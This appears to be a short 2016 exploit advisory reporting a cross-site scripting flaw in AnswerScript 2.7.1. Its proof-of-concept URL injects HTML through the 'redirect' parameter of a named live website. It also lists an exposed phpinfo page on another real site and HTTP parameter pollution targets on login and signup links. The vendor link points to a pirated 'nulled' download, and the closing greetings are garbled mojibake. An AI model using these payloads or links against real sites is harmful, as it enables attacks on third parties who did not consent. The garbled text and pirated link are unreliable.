AnswerScript 2.7.1 Cross Site Scripting
Posted on 03 October 2016
======================================================================== | # Title : AnswerScript v2.7.1 XSS vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 FranASSais V.(Pro) | # Version : v2.7.1 | # Vendor : http://www.p30vel.ir/wp-content/uploads/AnswerScript_v2.7.1_Nulled_www.P30vel.ir_.zip | # Dork : n/a ======================================================================== poc : http://www.prayzr.com//login?redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw%3d%3d%27%22()%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E php info : http://www.curso-biomagnetismo.com/biomagnetismo/phpinfo.php HTTP parameter pollution : affects /login.php Attack details : URL encoded GET input redirect was set to aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==&n914757=v973596 Parameter precedence: last occurrence Affected link: http://www.prayzr.com/signup?redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==&n914757=v973596 Affected parameter: redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw== Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------ | jericho * Larry W. Cashdollar * moncet-1 * achraf.tn | | ===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================